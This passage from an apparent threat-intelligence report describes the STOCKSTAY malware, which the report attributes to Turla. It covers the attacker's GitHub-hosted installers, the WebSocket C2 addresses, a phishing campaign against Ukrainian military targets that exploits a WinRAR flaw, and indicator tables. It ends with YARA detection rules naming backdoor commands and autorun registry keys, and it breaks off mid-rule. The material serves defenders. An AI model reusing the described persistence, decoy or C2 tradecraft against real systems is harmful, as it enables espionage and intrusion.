</td>
<td>
<p><span>Compromised WordPress infrastructure hosting STOCKSTAY ZIP archive</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://canal1zac1a.onrender.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 16: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>July 23 – 28, 2025: Actor Uses GitHub to Host STOCKSTAY MSI Files</span></h4>
<p><span>GTIG identified a GitHub account we suspect of being used by the threat actor to test or deploy STOCKSTAY. The GitHub account, </span><code>Roberto1983-ai</code><span>, was created on July <span>23,</span> 2025 at 12:01:03. </span></p>
<p><span>On July <span>24,</span> 2025, the account created a public repository named </span><code>msi_installer_test2</code><span>, into which a single file was uploaded: </span><code>DiplomacyEduAI.msi</code><span>. A second repository, this time named </span><code>msi_installer_test3</code><span>, was created by the same user on July 28, 2025, and subsequently populated with another version of </span><code>DiplomacyEduAI.msi</code><span>.</span></p>
<p><span>Both versions of </span><code>DiplomacyEduAI.msi</code><span> contained core STOCKSTAY components, alongside a configuration file containing the WebSocket C2 URL </span><code>wss://canal1zac1a.onrender.com/ws</code><span>. GTIG has been unable to identify any active operations using these specific MSI files.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>DiplomacyEduAI.msi</code></p>
</td>
<td>
<p><span>MSI containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>19e6ed42248f9d03beb343a7c09a864dcd3cd671c29e1e5eac93579225224ac9</code></p>
</td>
</tr>
<tr>
<td>
<p><code>DiplomacyEduAI.msi</code></p>
</td>
<td>
<p><span>MSI containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>6298f3150ad94a242e649886d47c59c634a4d04b9af5ee15e3bf335c40b5e58e</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ClientMNGR.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>80f6c010fd260d0bcf18a4b6a8d62505adbed50d2e615ed9522c4bfd61c00661</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ViewPdf.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ConverterDDSNet.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>d8fe8f3fe838d5b1a1043096f6f6bb6f524f5f1b0c9f83a081078a824daa0cf3</code></p>
</td>
</tr>
<tr>
<td>
<p><code>fonts</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>4e3bed10a8eff3e9205c1f37f647512464271d5ac65df7ae4709735621a38320</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 17: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://canal1zac1a.onrender.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 18: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>August 14, 2025: Actor Uses GitHub to Host STOCKSTAY Server Code</span></h4>
<p><span>GTIG identified a second GitHub account, which was observed hosting what we assess to be server-side code for handling STOCKSTAY C2 communications. The GitHub account, </span><code>ChikenFresh</code><span>, was created on August 14, 2025, then almost immediately created a public repository named </span><code>google-ai-labs-it</code><span>, into which the suspected C2 controller code was uploaded. Our analysis of the C2 controller is included in the malware analysis section earlier in this report.</span></p>
<p><span>The GitHub repository name corresponds with a STOCKSTAY C2 server identified running on the Render platform, however GTIG has not observed any active operations using this infrastructure. We assess that the threat actor linked this GitHub repository to their Render account in order to utilize their </span><a href="https://render.com/docs/websocket" rel="noopener" target="_blank"><span>WebSocket hosting</span></a><span> capabilities.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>server.py</code></p>
</td>
<td>
<p><span>Python STOCKSTAY C2 controller</span></p>
</td>
<td>
<p><code>f04f43b6f7c2d86109c495179b497f7fb45fd95816623de1b77900f71b4f99ed</code></p>
</td>
</tr>
<tr>
<td>
<p><code>models.py</code></p>
</td>
<td>
<p><span>Database table definitions and models for use by </span><code>server.py</code><span> </span></p>
</td>
<td>
<p><code>7615140f78d9a0ce31cc9fe8c54c60028a7439cb32526fd97b10afef7145dd78</code></p>
</td>
</tr>
<tr>
<td>
<p><code>wtools.py</code></p>
</td>
<td>
<p><span>Utility functions for use by </span><code>server.py</code></p>
</td>
<td>
<p><code>b55f3b8a7334af049ba3f70a9ad3fe78574b1e180c68baf9a7110d104387a636</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 19: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://google-ai-labs-it.onrender.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 20: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>November 2025: Ukraine — Drone-Related Lures and Deployment via CVE-2025-8088</span></h4>
<p><span>On November 6, 2025, GTIG identified a batch of phishing emails being sent from a drone-themed UKR.NET email account, to approximately 20 Ukraine-based targets, each containing a unique ukr.net file sharing link. Each link led to a malicious RAR archive which exploits a path traversal vulnerability in WinRAR (</span><a href="https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability"><span>CVE-2025-8088</span></a><span>) to install the core STOCKSTAY components. Continuations of this phishing activity were observed on November 12 and 14, 2025. We identified that only around 30% of the recipients of these phishing emails opened the emails, however we are unable to confirm how many of these individuals downloaded or executed the malicious payloads. All affected Google accounts were marked for additional authentication checks as a precautionary measure against potential account compromise. Google also notified affected users via our </span><a href="https://support.google.com/mail/answer/2591015" rel="noopener" target="_blank"><span>Government Backed Attack Warning</span></a><span> (GBAW) notifications.</span></p>
<p><span>GTIG identified two distinct types of Ukrainian-language decoy documents within the malicious RAR archives, both appearing to target Ukrainian military personnel. The first, “Донесення БпЛА 06.11.2025.docx” (“UAV report 06.11.2025.docx”), claimed to be “[A] Report on the availability/need for UAVs, their condition, the availability of crews for each UAV in the units, their training in the defense zone of the 1st Brigade as of 06.11.2025” (see Figure 10).</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig10.max-1000x1000.png" alt="“Report” Decoy document from November 2025">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="9e24u">Figure 10: “Report” Decoy document from November 2025</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>The second decoy, observed as “Товари(докладніше).docx” (“Products (more details).docx”) and “Приклади товарів для листа (деталізовано).docx” (“Examples of products for the letter (detailed).docx”), predominantly comprised of an equipment list referencing: “Tactical medicine”; “Communication and surveillance equipment”; “Equipment and survival equipment”; and “Automotive property” (see Figure 11).</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig11.max-1000x1000.png" alt="“Equipment List” Decoy document from November 2025">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="9e24u">Figure 11: “Equipment List” Decoy document from November 2025</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Each of the decoy documents contained an external image reference that causes a connection to be made from the victim’s machine to a site likely monitored by the threat actor, signaling that the document has been opened. GTIG believes the URLs referenced by the decoy documents may be hosted on compromised infrastructure.</span></p>
<p><span>GTIG identified that the instances of STOCKSTAY observed being deployed during this operation contained enhancements intended to increase resistance to detection, specifically by carving out functionality into external modules. These external modules were named to imitate legitimate Windows libraries, using the filenames shown in Table 20.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Component</strong></p>
</td>
<td>
<p><strong>Filename</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKMARKET</span></p>
</td>
<td>
<p><code>MSViewer.exe</code></p>
</td>
</tr>
<tr>
<td>
<p><span>Shared STOCKSTAY core module</span></p>
</td>
<td>
<p><code>ms-lib-math-core.dll</code></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKBROKER</span></p>
</td>
<td>
<p><code>MSDriver.exe</code></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKBROKER core module</span></p>
</td>
<td>
<p><code>ms-api-wmcpdt.dll</code></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKTRADER</span></p>
</td>
<td>
<p><code>MSRender.exe</code></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKTRADER core module</span></p>
</td>
<td>
<p><code>ms-api-win-render.dll</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 21: STOCKSTAY component filenames observed in November 2025</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><p><span>GTIG observed two distinct STOCKSTAY WebSocket C2 URLs being used during this phishing wave. The majority of instances used the URL </span><code>wss://driverx86-adobe.onrender.com/ws</code><span>; however, we were able to identify at least one instance of STOCKSTAY using </span><code>wss://google-ai-labs-it.onrender.com/ws</code><span>, corresponding to the previously described GitHub repository associated with the </span><code>ChikenFresh</code><span> user.</span></p>
<p><span>Alongside the core STOCKSTAY components, the malicious RAR archives contained LNK files, described as “Updater Shortcut”, corresponding to each core STOCKSTAY component. The extraction file path was configured to attempt to deploy into the startup programs directory. </span></p>
<p><span>GTIG was able to identify that the actor began creating the LNK files for this operation approximately six hours prior to the first phishing emails being sent, with the Ukrainian-language lure documents being created around four hours prior.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>MSViewer.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>a40bf9c75d1bfa6d66f1179f2321de6589f80d3089d992797a9cb0e84f6196ce</code></p>
</td>
</tr>
<tr>
<td>
<p><code>MSViewer.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>e316b1e13154dc6115e1e0c023f6fe3d17861cae839d4a4a81779b6aad9a24f8</code></p>
</td>
</tr>
<tr>
<td>
<p><code>MSDriver.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>c905cb512018cc55512c6a22677c3d6f389c47afd54d7c85797868fc4fcb90e9</code></p>
</td>
</tr>
<tr>
<td>
<p><code>MSRender.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>667a8f568a611f2f3d84a366b7946b360e055bece9699c95aad619637ab72a38</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ms-lib-math-core.dll</code></p>
</td>
<td>
<p><span>Module containing core crypt and obfuscation routines, historically found within core STOCKSTAY components</span></p>
</td>
<td>
<p><code>b287347a5bff8af360ce0e6500c336b6fe6d97920abc26202c9d843ffebc5f89</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ms-api-win-render.dll</code></p>
</td>
<td>
<p><span>Module containing backdoor command handlers, historically found within STOCKSTAY.STOCKTRADER</span></p>
</td>
<td>
<p><code>1682e8d82016b3f10434d2ebac995fd3b6aa812f079bfd7888652e94a994d851</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ms-api-wmcpdt.dll</code></p>
</td>
<td>
<p><span>Module containing STOCKSTAY’s IPC logic, historically found within each STOCKSTAY component</span></p>
</td>
<td>
<p><code>e2a0f4440f67998a0215d49be31746ea192bfcb4dc4ee532a218f8cf13605714</code></p>
</td>
</tr>
<tr>
<td>
<p><code>MSViewer.lnk</code></p>
</td>
<td>
<p><span>LNK shortcut intended to execute STOCKSTAY.STOCKMARKET</span></p>
</td>
<td>
<p><code>3627f582420ad2782d452fe6d13fae42658d1484296351d3916703e25dcadd14</code></p>
</td>
</tr>
<tr>
<td>
<p><code>MSRender.lnk</code></p>
</td>
<td>
<p><span>LNK shortcut intended to execute STOCKSTAY.STOCKTRADER</span></p>
</td>
<td>
<p><code>77417df21b4b4e8d86b8bda4afeef93fd36f355362586b2d1f51121a82244167</code></p>
</td>
</tr>
<tr>
<td>
<p><code>MSDriver.lnk</code></p>
</td>
<td>
<p><span>LNK shortcut intended to execute STOCKSTAY.STOCKBROKER</span></p>
</td>
<td>
<p><code>813c78b5b6ef28a9c0ed35f2c6cd88fc50880ab91f8777dfe7aaccb1c24b08d5</code></p>
</td>
</tr>
<tr>
<td>
<p><code>fonts</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>e83f274bf9914c6cfc0c6b3cdadf089565f49dace4aca93287c22aba9641c8f3</code></p>
</td>
</tr>
<tr>
<td>
<p><code>fonts</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>f964353b9ae4bedbe62de6c0d7eafa9fb8b87897bbaea483aedaa8ae191834da</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span>Table 22: File indicators</span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://driverx86-adobe.onrender.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://google-ai-labs-it.onrender.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 23: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h3><span>Attribution</span></h3>
<p><span>GTIG attributes the STOCKSTAY ecosystem and related activity to threat clusters assessed with high confidence links to Turla, based on the following:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>STOCKSTAY uses Windows-1251 during command-processing - an encoding notably designed specifically to support Cyrillic script. This is indicative of a development or operational environment linked to Eastern Europe, the Balkans, or Central Asia. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>STOCKSTAY has code overlaps with KAZUAR, a widely-attributed proprietary Turla toolkit, based on the recent introduction of K1MORPHER string obfuscation into both malware families within a similar time window.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>GTIG observed STOCKSTAY being delivered from compromised infrastructure which was also identified as hosting part of Turla’s victim-facing KAZUAR C2 infrastructure.</span></p>
</li>
</ul>
<p><span>Turla has a consistent focus on targeting Ukrainian Defense and Military organizations, and was identified within a Mandiant Incident Response deploying STOCKSTAY alongside a range of other proprietary Turla malware, such as WILDDAY, DIAMONDBACK, and KAZUAR.</span></p>
<h3><span>Detections</span></h3>
<h4><span>Google Security Operations (SecOps)</span></h4>
<p><span>SecOps customers will have access to the following pending-deployment rules. Once fully deployed, these rules will be available under the Mandiant Frontline Threats, Mandiant Hunting and Mandiant Intel Emerging Threats rule packs:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Archiver Extraction To Windows Startup</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Registry Write Registry Run Keys</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Registry Write to Run Registry Key</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Potential RDP File Write From Phishing</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>RDP Connection Initiated from Staging Directory</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Onrender Subdomain Suspicious DNS Query</span></p>
</li>
</ul>
<h4><span>YARA Rules</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_ConfigurationFile_2 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects encrypted configuration files associated with STOCKSTAY."
        hash = "40a3b969d81ef1ef35dd9ebcc6774e060b1b8949d3d74f38ca6b7d789c95cdb3"

    strings:
        $s1 = "\"SystemConfiguration\""
        $s2 = "An application for getting information about current events on trading platforms"
        $s3 = "To set the time for updating information, enter a value in minutes in the `Interval` field"
        $s4 = "The `SystemConfiguration` field stores the system settings of the application."
        $s5 = "In the `services` field, fill in the list of addresses of services that provide the `WebSocket protocol`."
        $s6 = "wss://"

    condition:
        uint16(0) == 0x227B  // {"
        and 4 of ($s*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_ConfigurationFile_3 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects early configuration files associated with STOCKSTAY."
        hash = "1a2ca8b8e0344fe3d80da7352206a470245443e2349a237bc093df934ddc011f"

    strings:
        $key_required_1 = "\"List 1\""
        $key_required_2 = "\"List 2\""
        $key_required_3 = "\"List 3\""
        $key_dummy_1 = "\"BinanceApi\""
        $key_dummy_2 = "\"CoinbaseCloudApi\""
        $key_dummy_3 = "\"CoinbaseCloudApi Sandbox\""
        $key_dummy_4 = "\"ByBitApi Spot\""
        $key_dummy_5 = "\"ByBitApi Linear\""
        $key_dummy_6 = "\"Info level\""
        $key_dummy_7 = "\"Rate info\""
        $key_dummy_8 = "\"Info level\""

    condition:
        uint8(0) == 0x7B  // {
        and filesize &gt; 500
        and all of ($key_required_*)
        and 3 of ($key_dummy*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_ConfigurationFile_5 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects plaintext configuration files used by the STOCKSTAY malware family."
    hash = "6cee9e838792ac5e2098362d68ce93a9a2c095d476dc16b289fe8509c99b2b8b"

  strings:
    $internal_id_1 = "\"internal_id\""
    $internal_id_2 = "\"i_id\""
    $internal_key_1 = "\"internal_key\""
    $internal_key_2 = "\"i_k\""
    $interval_engine_1 = "\"interval_engine\""
    $interval_engine_2 = "\"ie\""
    $level_info_1 = "\"level_info\""
    $level_info_2 = "\"li\""
    $time_scale_1 = "\"time_scale\""
    $time_scale_2 = "\"ts\""
    $span_min_1 = "\"span_min\""
    $span_min_2 = "\"mx1\""
    $span_max_1 = "\"span_max\""
    $span_max_2 = "\"my1\""
    $rate_1 = "\"rate\""
    $rate_2 = "\"rt_x_y\""
    $rate_control_1 = "\"rate_control\""
    $service_1 = "\"service\""
    $service_2 = "\"srv\""
    $days_not_work_1 = "\"days_not_work\""
    $days_not_work_2 = "\"dnw\""
    $system_properties_1 = "\"system_properties\""
    $system_properties_2 = "\"sp\""

  condition:
    any of ($internal_id*)
    and any of ($internal_key*)
    and any of ($interval_engine*)
    and any of ($level_info*)
    and any of ($time_scale*)
    and any of ($span_min*)
    and any of ($span_max*)
    and any of ($rate*)
    and any of ($service*)
    and any of ($days_not_work*)
    and any of ($system_properties*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_CryptoContainer_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects code for parsing crypto containers within STOCKSTAY components."
        hash = "82707cfdf24dcb762f4615f01e1ba4d3dfdec4abe9cd588558d2634d7e6a5eeb"

    strings:
        $s1 = "BuildCryptoContainer"
        $s2 = "ParseCryptoContainer"
        $s3 = "Windows-1251" wide
        $s4 = "AesCryptoServiceProvider"
        $s5 = "RSACryptoServiceProvider"

    condition:
        uint16(0) == 0x5a4d
        and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_WindowNames_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY window names."
        hash = "dfd5cb91d06b9649d4cab500343af80ad1144a9e46641cc406f43dd169003c22"


    strings:
        $import = "_CorExeMain"
        $s2 = "SMEditorPage" wide
        $s3 = "SMNetPage" wide
        $s4 = "StockMarketViewPage" wide
        $s5 = "window_system32_x128" wide
        $s6 = "window_system32_x64" wide
        $s7 = "window_system32_x32" wide

    condition:
        $import 
        and any of ($s*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Downloader_STOCKSTAY_MARKETMAKER_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.MARKETMAKER downloader based on method names and payload filenames."
        hash = "da8a96bc74e265f945f1cc6992c6dc0f9ea36ed1991f7b8d312db79d9bf78c40"

    strings:
        $f1 = "CheckAutoRun"
        $f2 = "SetupAutoRun"
        $f3 = "DownloadAndExtractZip"
        $f4 = "GetSystemProxy"

        $s0 = "_CorExeMain"
        $s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
        $s2 = "StockMarketView.exe" wide
        $s3 = "SMNet.exe" wide
        $s4 = "SMEditor.exe" wide

    condition:
        all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Controller_STOCKSTAY_STOCKMARKET_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.STOCKMARKET controller based on method and field names, and SQL queries"
        hash = "2af7b513c05e76d7da5f75bb0a223c894a706c99ef2c2ddfe4eae542f95a08e0"

    strings:
        $f1 = "ProtocolMessageConnect"
        $f2 = "ProtocolMessageEnd"
        $f3 = "ProtocolMessagePing"
        $f4 = "ProtocolMessageRequestRecv"
        $f5 = "ProtocolMessageRequestSend"
        $f6 = "ProtocolMessageTask"
        $f7 = "ProtocolMessageTaskSysinfo"
        $f8 = "TMR_AppInit_Tick"
        $f9 = "TMR_Engine_Tick"
        $f10 = "TMR_KeepAlive_Tick"
        $f11 = "TMR_PingNet_Tick"
        $f12 = "TMR_PingSystem_Tick"
        $f13 = "GetDataTrade"
        $f14 = "GetDataNews"
        $f15 = "InsertDataTrade"
        $f16 = "InsertDataNews"
        $sql1 = "CREATE TABLE IF NOT EXISTS News (" wide
        $sql2 = "CREATE TABLE IF NOT EXISTS Trade (" wide
        $sql3 = "CREATE TABLE IF NOT EXISTS Market (" wide
        $sql4 = "INSERT INTO Market ( Guid, Version, Config, Status, Launch, Type ) VALUES (@Guid, @Version, @Config, @Status, @Launch, @Type)" wide
        $sql5 = "INSERT INTO News (Container) VALUES (@Container)" wide
        $sql6 = "INSERT INTO Trade (Container) VALUES (@Container)" wide

    condition:
        8 of ($f*)
        and any of ($sql*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Tunneler_STOCKSTAY_STOCKBROKER_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.STOCKBROKER tunneler based on known IPC message handler and variable names."
        hash = "dfd5cb91d06b9649d4cab500343af80ad1144a9e46641cc406f43dd169003c22"

    strings:
        $s1 = "_CorExeMain"
        $s2 = "ProtocolMessageStatusConnection"
        $s3 = "ProtocolMessageResult"
        $s4 = "ProtocolMessageEnd"
        $s5 = "OnGetDataFromServer"
        $s6 = "webSocket"
        $s7 = "wmCopyData"
        $s8 = "tempStorage"

    condition:
        all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_STOCKTRADER_3 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.STOCKTRADER backdoor based on known command handlers and FNV1a hashes."
        hash = "82707cfdf24dcb762f4615f01e1ba4d3dfdec4abe9cd588558d2634d7e6a5eeb"

    strings:
        $cmd_1 = "AppDel"
        $cmd_3 = "AppDeleteRegistryValue"
        $cmd_4 = "AppDir"
        $cmd_5 = "AppGet"
        $cmd_6 = "AppMkdir"
        $cmd_7 = "AppPut"
        $cmd_8 = "AppReadRegistryValue"
        $cmd_9 = "AppRegistryKeyExists"
        $cmd_10 = "AppRmdir"
        $cmd_11 = "AppRun"
        $cmd_12 = "AppWriteRegistryValue"
        $cmd_13 = "AppUnpackArchive"
        $cmd_14 = "ArchiveFiles"
        $cmd_15 = "GetFiles"
        $cmd_16 = "Sysinfo"
        
        $hash_1  = {ea8e5e34}
        $hash_2  = {3445694e}
        $hash_3  = {f73e97b6}
        $hash_4  = {9aa70c59}
        $hash_5  = {18b496c9}
        $hash_6  = {0f716ebc}
        $hash_7  = {8e2d79ce}
        $hash_8  = {3ae2a963}
        $hash_9  = {35d26840}
        $hash_10 = {6c41d6bc}
        $hash_11 = {1fdbbb2f}
        $hash_12 = {6ae6578d}
        $hash_13 = {66732be7}
        $hash_14 = {0b113b3d}

    condition:
        uint16(0) == 0x5a4d
        and (
            12 of ($cmd*)
            or 10 of ($hash*)
        )
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Hunting_K1MORPHER_1 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects plaintext class and method names associated with the .NET class K1.Morpher"
    hash = "45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893"

  strings:
    $plain_api_1 = "Squirrel3"
    $plain_api_2 = "DecryptArraySimple"
    $plain_api_3 = "DecryptIntSimple"
    $plain_api_4 = "DecryptLongSimple"
    $plain_api_5 = "DecryptFloatSimple"
    $plain_api_6 = "DecryptStringSimple"
    $plain_api_7 = "DecryptDoubleSimple"
    $plain_api_8 = "_squ_ui1"
    $plain_api_9 = "_squ_ui2"
    $plain_api_10 = "_squ_ui3"
    $plain_api_11 = "InjectedSeedCipher"

  condition:
    dotnet.is_dotnet
    and 5 of ($plain_api*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Hunting_K1MORPHER_2 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects the Squirrel3 RNG implemented within K1.Morpher"
    hash = "45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893"

  strings:
    $squirrel3_code_1 = {
      00 // nop
      03 // ldarg.1
      0A // stloc.0
      06 // ldloc.0
      7E ??????04 // ldsfld &lt;token&gt;
      5A // mul
      0A // stloc.0
      06 // ldloc.0
      02 // ldarg.0
      58 // add
      0A // stloc.0
      06 // ldloc.0
      06 // ldloc.0
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      0A // stloc.0
      06 // ldloc.0
      7E ??????04 // ldsfld &lt;token&gt;
      58 // add
      0A // stloc.0
      06 // ldloc.0
      06 // ldloc.0
      1E // ldc.i4.8
      62 // shl
      61 // xor
      0A // stloc.0
